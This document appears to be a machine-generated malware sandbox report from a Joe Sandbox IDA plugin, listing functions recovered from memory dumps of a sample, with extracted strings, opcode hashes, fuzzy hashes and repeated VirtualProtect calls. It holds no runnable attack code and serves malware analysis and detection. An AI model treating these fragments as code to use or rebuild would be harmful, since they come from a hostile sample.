1kKR, xrefs: 0B398641
L:*S, xrefs: 0B398F35
k8w[, xrefs: 0B398C45
T}A, xrefs: 0B398C80
Q<, xrefs: 0B399299
sVYZ, xrefs: 0B398AEE
L:*S, xrefs: 0B398F55
qrA&, xrefs: 0B39963E
1kKR, xrefs: 0B39863A
T}A, xrefs: 0B398C90
"F, xrefs: 0B398CC9
L:*S, xrefs: 0B398F2B
1kKR, xrefs: 0B398658
P4s, xrefs: 0B398804
:L|, xrefs: 0B398620
cEVT, xrefs: 0B399715
sVYZ, xrefs: 0B398AF8
P4s, xrefs: 0B39880B
"F, xrefs: 0B398CC2

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: "F$"F$1kKR$1kKR$1kKR$:L|$L:*S$L:*S$L:*S$P4s$P4s$T}A$T}A$cEVT$k8w[$qrA&$sVYZ$sVYZ$Q<
API String ID: 0-3309473870
Opcode ID: 1ac1d6199046fae454b6d6b7d0992c4393a3ac780ad6a70ce253914036ef9b2c
Instruction ID: d15880e34785be5329c74ae33ebd6cfaa4aa8d1fe3bfa78b48a063308da873fc
Opcode Fuzzy Hash: 1ac1d6199046fae454b6d6b7d0992c4393a3ac780ad6a70ce253914036ef9b2c
Instruction Fuzzy Hash: ACA25974A04229CFDB64DF54E998B9DBBB2FB99700F2081D9D41AAB354DB309E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0B398538 Relevance: 18.4, Strings: 14, Instructions: 917COMMON

Download Yara Rule

Strings

1kKR, xrefs: 0B398641
L:*S, xrefs: 0B398F35
k8w[, xrefs: 0B398C45
Q<, xrefs: 0B399299
L:*S, xrefs: 0B398F55
qrA&, xrefs: 0B39963E
1kKR, xrefs: 0B39863A
T}A, xrefs: 0B398C90
"F, xrefs: 0B398CC9
L:*S, xrefs: 0B398F2B
1kKR, xrefs: 0B398658
:L|, xrefs: 0B398620
cEVT, xrefs: 0B399715
sVYZ, xrefs: 0B398AF8

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: "F$1kKR$1kKR$1kKR$:L|$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$sVYZ$Q<
API String ID: 0-1202736677
Opcode ID: 3fda1a9d79c3e2c998f1f015fa819d0855b11b1386da2607e2af43fe37e0b743
Instruction ID: b2a2ff6446788f17597525d023080ed42248638293a1e99fb0649e379736de94
Opcode Fuzzy Hash: 3fda1a9d79c3e2c998f1f015fa819d0855b11b1386da2607e2af43fe37e0b743
Instruction Fuzzy Hash: C1927A74A04229CFDB64DF18E998B9DB7B2FB98300F208199D41AEB354DB309E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01535AF1 Relevance: 6.7, Strings: 5, Instructions: 415
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hE, xrefs: 01535ED3
5cgu, xrefs: 01536236
$#&b, xrefs: 01535D60
5cgu, xrefs: 01536240
#RH, xrefs: 01535D86

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: #RH$$#&b$5cgu$5cgu$hE
API String ID: 0-1348839357
Opcode ID: 22a9cf8a843294d3732afff18f92ff8fd56a51b595b2cde6ba0e15c2820f7123
Instruction ID: 4cba9c5ec3f2e6e26efde507262c3899a52bdd0183667e229e452112174acd0a
Opcode Fuzzy Hash: 22a9cf8a843294d3732afff18f92ff8fd56a51b595b2cde6ba0e15c2820f7123
Instruction Fuzzy Hash: 8FF18E78B002158FCB59DF68D81825EBBB3BBC9211F2584A9D40EEB759DF348D468F81

Uniqueness

Uniqueness Score: -1.00%

Function 01535BFB Relevance: 6.6, Strings: 5, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hE, xrefs: 01535ED3
5cgu, xrefs: 01536236
$#&b, xrefs: 01535D60
5cgu, xrefs: 01536240
#RH, xrefs: 01535D86

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: #RH$$#&b$5cgu$5cgu$hE
API String ID: 0-1348839357
Opcode ID: 88ab688af22c3216d4c9c4070f0691dee4377cb0682337b02352956138cb8c26
Instruction ID: 26285213ebd06958a3854967b46a1c98933fe9334651e9963e61b3cbba840d8a
Opcode Fuzzy Hash: 88ab688af22c3216d4c9c4070f0691dee4377cb0682337b02352956138cb8c26
Instruction Fuzzy Hash: FED14D78B001158FDB58DF68E81825EBBB3BBC9211F258469D80EEB758DF349D468F81

Uniqueness

Uniqueness Score: -1.00%

Function 0B3926E2 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

jop5, xrefs: 0B3927C4

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: jop5
API String ID: 0-1339619763
Opcode ID: 9a555290ad3d9479d09af643de948b8e6c5b29e7c61d9f10bad47f835e63f4f5
Instruction ID: 74da47c00f813d90bd53d787007558388211fd695808bdf956e57515e131365a
Opcode Fuzzy Hash: 9a555290ad3d9479d09af643de948b8e6c5b29e7c61d9f10bad47f835e63f4f5
Instruction Fuzzy Hash: 2471F335B04605AFDF14CBA8E8546AF77F6ABC8710F25442AE806EB750DB74DD02CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B39A628 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

P3e, xrefs: 0B39A72C

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: P3e
API String ID: 0-2387664673
Opcode ID: c2058ff20391ee76f2823cd68a8eef49f5a389fc1bc8df2eb325d13789642868
Instruction ID: 568242660899a8ec66f38fc6d973ab11d2289c02e048c84dd822898110dc5040
Opcode Fuzzy Hash: c2058ff20391ee76f2823cd68a8eef49f5a389fc1bc8df2eb325d13789642868
Instruction Fuzzy Hash: 9A51F034B042058FDB54ABB8A4296AE76FBFB89304F35856AD416EB350DF71CC028B90

Uniqueness

Uniqueness Score: -1.00%

Function 0B3926F0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

jop5, xrefs: 0B3927C4

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: jop5
API String ID: 0-1339619763
Opcode ID: c6ed4f17c8745094ed947e69a5b9a52a2539869cecdee068207776c9d5312a97
Instruction ID: b1d02460b3376ef65402f803e9ec1e3634b40461fb6cfd57951e603150cdb2a5
Opcode Fuzzy Hash: c6ed4f17c8745094ed947e69a5b9a52a2539869cecdee068207776c9d5312a97
Instruction Fuzzy Hash: A4513238B04605EBDF149A68E81467F76EBABC8710F24442AE807EB754DF30DE02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01532028 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

J:Q, xrefs: 015320B6

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: J:Q
API String ID: 0-553654187
Opcode ID: e412adcb8b796585c08ecc1032057f68cf47ee44cc8287105114c2a8a2c52e2e
Instruction ID: d6583c13ad0c0955491633de12652b430c3209d4683874ebf884dc2eb48205a5
Opcode Fuzzy Hash: e412adcb8b796585c08ecc1032057f68cf47ee44cc8287105114c2a8a2c52e2e
Instruction Fuzzy Hash: 8151E336E001158FD7149BAEC945A6FF7E7FBC4600F12852AD90AEF3A4CA349D498BD1

Uniqueness

Uniqueness Score: -1.00%

Function 015318E8 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

3z_, xrefs: 01531F52

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: 3z_
API String ID: 0-3296393077
Opcode ID: 8e732ad78113031940229e8adb525ccca06a1e94f256b82687de8a5754e09cd5
Instruction ID: 5cd7dfed4789ca583a924db87d5ac0be75296f06c5dcc2575a8438650673f204
Opcode Fuzzy Hash: 8e732ad78113031940229e8adb525ccca06a1e94f256b82687de8a5754e09cd5
Instruction Fuzzy Hash: 7E41AB30A14704CFCB24CF78C88489EBBF5BB8A300B01896AD456EF252DB38D845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B3973AA Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c590e4350c531c81006472a899d6d29f151386b1fcaf741efffd670288af0806
Instruction ID: 7360ccdb8bd720ec6ded33c226955c6b3b6a8254f2e3215352007bc8f7f95118
Opcode Fuzzy Hash: c590e4350c531c81006472a899d6d29f151386b1fcaf741efffd670288af0806
Instruction Fuzzy Hash: 6F91B735F24219CBDB44CFA9D9905AEBBFAAFC8704F248826D415EB684DB30DD05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0B3973B8 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d140b64285a3c5ef9fdfcc9d77c20b6b94e49623b224c88b36a2f7d3b76484e
Instruction ID: 50381ef5be6b3e174dce9429ce073f11a15689388a0b6f02eec3a6e2fb9b0be0
Opcode Fuzzy Hash: 5d140b64285a3c5ef9fdfcc9d77c20b6b94e49623b224c88b36a2f7d3b76484e
Instruction Fuzzy Hash: 6D91A475F24219CBDB44CFA9D9905AEBBFAAFC8600F248926D415EB784DB30DD058B81

Uniqueness

Uniqueness Score: -1.00%

Function 01531F91 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a888685c1f7703326dd8bebd7ea4d738367b07abbb65cb40e9a9508ff1f1da
Instruction ID: 10ef2e2f8441b87108e2ac7552fe4c7f9d0f68ff6eab1ab4a42b409c8a231895
Opcode Fuzzy Hash: d6a888685c1f7703326dd8bebd7ea4d738367b07abbb65cb40e9a9508ff1f1da
Instruction Fuzzy Hash: 0F714372A002148FC7548F79C885AAABBF7FFC1610F05856ADC05AF365CA399D09CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 015333FA Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125ce46ee30852a7acd0d4e32e1123881041ce02a09c6fb90d97f4ae8b664045
Instruction ID: 50a575e5617f37261cb940ee0ae6250189531be72fd1f6001f0968da2880f762
Opcode Fuzzy Hash: 125ce46ee30852a7acd0d4e32e1123881041ce02a09c6fb90d97f4ae8b664045
Instruction Fuzzy Hash: 7B710475605205CFC78ACF24C98486ABBF6FFC5304B0689A2D856DF266C338ED46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0153251A Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a502e9397796b2392f7d5d11c4c1806c76f90b4fd3273546be05a1a8ee1d464
Instruction ID: 9888cec7beac0cd5e1f0c798a0b7b77e7cd725f9e5f5b1b56c89b97176863b53
Opcode Fuzzy Hash: 5a502e9397796b2392f7d5d11c4c1806c76f90b4fd3273546be05a1a8ee1d464
Instruction Fuzzy Hash: 0861F131A047448FC745CFA998904AAFBFABBC9320F55886BE506DF6A1C338DE518B51

Uniqueness

Uniqueness Score: -1.00%

Function 01533438 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b906457cbf6130812f54758c201cabbf460e0fed3c1e42e546e226e930b832bd
Instruction ID: 162db3058d42bc5b4f79d948e38b4854607dcd97df9586c505b90dfa0d852159
Opcode Fuzzy Hash: b906457cbf6130812f54758c201cabbf460e0fed3c1e42e546e226e930b832bd
Instruction Fuzzy Hash: 2C61D079605205CFC78ACF28C58842ABBE6FFC4308B524992D956DF3A6C734ED85CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0B397549 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60689074917b91607d3892744f2af02fec578c1aa960eded1ee0323b00f815b5
Instruction ID: ee84d793a19219088bd200139e46f014b895eb1f42456d96c7205a8f118115f8
Opcode Fuzzy Hash: 60689074917b91607d3892744f2af02fec578c1aa960eded1ee0323b00f815b5
Instruction Fuzzy Hash: 4741A535F24109DBDF54CBA8E945AAFB7BAAB88644F248826E416EB6C0DB30DD05C750

Uniqueness

Uniqueness Score: -1.00%

Function 01530E54 Relevance: 1.8, APIs: 1, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4038608630e6e0d06340fda0ff372c71876f6b31e5579c22cc5efd27a74e2a89
Instruction ID: 80f5f477b904a35ab7328e167854307cd47a3f9c86afa1a401cd5edb6e671bb5
Opcode Fuzzy Hash: 4038608630e6e0d06340fda0ff372c71876f6b31e5579c22cc5efd27a74e2a89
Instruction Fuzzy Hash: 3EB18D709443449FCB51CF64D8C49DABBB9FF85324B18C0AAEC449B212D379A94ADBB1

Uniqueness

Uniqueness Score: -1.00%

Function 015310B9 Relevance: 1.7, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1f5cf30ebe838477e898916be656583bb125ecaa64efa8969d8530eaf0ba2c0d
Instruction ID: 38f64ea27a4b138d6d7230b6b4f7490c59a2733b82acdb012cbe0c1e0dd9cb78
Opcode Fuzzy Hash: 1f5cf30ebe838477e898916be656583bb125ecaa64efa8969d8530eaf0ba2c0d
Instruction Fuzzy Hash: 49619C708443019FCB90CF64D9C59DABBB9FF84324B58C06AEC549B606D339A94ADFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0153105D Relevance: 1.7, APIs: 1, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e43a5cf4053c01ef35deb6b47fb6a088045c837aed71031cad4fe455a24a7219
Instruction ID: 91c115d8a3871ba7209687066dff29865ca1aabd0ed34faa954604b4ef1cc63d
Opcode Fuzzy Hash: e43a5cf4053c01ef35deb6b47fb6a088045c837aed71031cad4fe455a24a7219
Instruction Fuzzy Hash: 66619E709443459FCB54CFA4DCC5ADABBB9FB85334B08C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 01531030 Relevance: 1.7, APIs: 1, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7842dd2b0f617e69aeb0390621a1b52a8d4fb7483c17549cfe151a90728058a2
Instruction ID: fe1ea4a8aed3e903d916e3a3d77024df45a3abf5ebc6d6d3954e1deb8a84b613
Opcode Fuzzy Hash: 7842dd2b0f617e69aeb0390621a1b52a8d4fb7483c17549cfe151a90728058a2
Instruction Fuzzy Hash: 4561A1709443459FC754CF64D8C19DABBB9FF85334B48C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 01530FE1 Relevance: 1.7, APIs: 1, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bc22e495d7de63b22561fbdf628695e3911088a0155873fb774b9990b2055ba0
Instruction ID: 7848b3ed2ebb3b088c0bd67aa4668e37da08e10b38c8a23f9f3f8b3bb5800d21
Opcode Fuzzy Hash: bc22e495d7de63b22561fbdf628695e3911088a0155873fb774b9990b2055ba0
Instruction Fuzzy Hash: 3B619E709443459FCB54CFA4D8C19DABBB9FF85334B08C06AEC449A206D339A94ADBB1

Uniqueness

Uniqueness Score: -1.00%

Function 01531143 Relevance: 1.7, APIs: 1, Instructions: 180
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ac304e062d3a6df0fb487bb383d9436bf10ca05490709be414360ae46471f401
Instruction ID: 1c7bb49a0047857b1605d98745064bf526361739a682149d2b1721f1d36e373e
Opcode Fuzzy Hash: ac304e062d3a6df0fb487bb383d9436bf10ca05490709be414360ae46471f401
Instruction Fuzzy Hash: AB619DB08443459FCB54CF64DDC1ADABBB9FB85334B18C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 0153160B Relevance: 1.7, APIs: 1, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e0f7ed4aa0bd8076f1c327980c1d309c157af9f636758f73936c68f1862c7e0
Instruction ID: d6856ca923c946db45bbf80b1416719da492abe56801d867fc64abf305d00194
Opcode Fuzzy Hash: 7e0f7ed4aa0bd8076f1c327980c1d309c157af9f636758f73936c68f1862c7e0
Instruction Fuzzy Hash: 98617D709443459FCB54CFA4DCC59DABBB9FF84334B18C06AEC449A206D339A94ADFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015315D6 Relevance: 1.7, APIs: 1, Instructions: 174
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1fa558b50ba94f1c6c69a4efad0d72254afe9aaf4c22431bbd1addb7111964a9
Instruction ID: 0528e4cd41dfdcb8bcb68af28fbe039820ea84cc01199545d35f9996c3d0c403
Opcode Fuzzy Hash: 1fa558b50ba94f1c6c69a4efad0d72254afe9aaf4c22431bbd1addb7111964a9
Instruction Fuzzy Hash: A7519EB08443459FC754CF64D8C59DABBB9FB84334B48C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 015311D1 Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f427f9466de103e14029068f74c0ad051ea075db31920897d21b53b095875036
Instruction ID: 7876fda6fbe8ab29adfe4593d40a27021fb635594468d99399d01e26100e4eb7
Opcode Fuzzy Hash: f427f9466de103e14029068f74c0ad051ea075db31920897d21b53b095875036
Instruction Fuzzy Hash: F3517F708443459FC794CFA4D8C59DABBB9FF85334B18C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 015311FE Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad359d41c2db48d51b3f91aafd849fd5ab11d81b76e7dd9b08c0c8dcdbef9668
Instruction ID: 87c8937b7c3210226b63b2842a32ee926ee4b1a1c142bb1aa726404395299458
Opcode Fuzzy Hash: ad359d41c2db48d51b3f91aafd849fd5ab11d81b76e7dd9b08c0c8dcdbef9668
Instruction Fuzzy Hash: 17517D708443459FCB94CFA4DCC59DABBB9FB85334B18C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 01531566 Relevance: 1.7, APIs: 1, Instructions: 172memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 89d6d6bafb9f43aad2a9eb98dc922053697f70e2a0f177fa25f0235ef8bf91f9
Instruction ID: d1c75b11475cdbd27287bdc4b44af37026525ff1b20a22d9a6f0deeb18ff9a89
Opcode Fuzzy Hash: 89d6d6bafb9f43aad2a9eb98dc922053697f70e2a0f177fa25f0235ef8bf91f9
Instruction Fuzzy Hash: 3251AF708443459FCB50CFA4D8C5ADABBB9FF84334B08C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 01531518 Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4ceab82db7297caeca28506c090b8d04990fdfb86ad44d9aa680c1068af0040c
Instruction ID: b3e4fd9a7165d4a733074679ee2490655faf4f262eb0330dd5fe2d602f5ad164
Opcode Fuzzy Hash: 4ceab82db7297caeca28506c090b8d04990fdfb86ad44d9aa680c1068af0040c
Instruction Fuzzy Hash: 45519D708443459FCB94CFA4D8C59DABBB9FF85334B18C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 015315A8 Relevance: 1.7, APIs: 1, Instructions: 172memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad35349c2bde686f81e48519483075ae139d1f8fa1710dbc6a5e60db1881ed54
Instruction ID: 2b0c5637117dd18ab573ce63593395dd7978ab4d4b932457758a30c246f724ac
Opcode Fuzzy Hash: ad35349c2bde686f81e48519483075ae139d1f8fa1710dbc6a5e60db1881ed54
Instruction Fuzzy Hash: F7518E708443459FCB94CF64D9C59DABBB9FB84334B48C06AEC445A206D33DA94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 01531454 Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3ef3ad6e864e56ad363057221c9917c25694b98cceee2a12e27c860c88c0db07
Instruction ID: 361396d564889243b44076040580bb24c420199309894a572ff569487c8e73ca
Opcode Fuzzy Hash: 3ef3ad6e864e56ad363057221c9917c25694b98cceee2a12e27c860c88c0db07
Instruction Fuzzy Hash: A1518F708443459FCB54CFA4DDC59DABBB9FB85334B08C06AEC445A206D339A94ADFB1

Uniqueness

Uniqueness Score: -1.00%

Function 01531481 Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

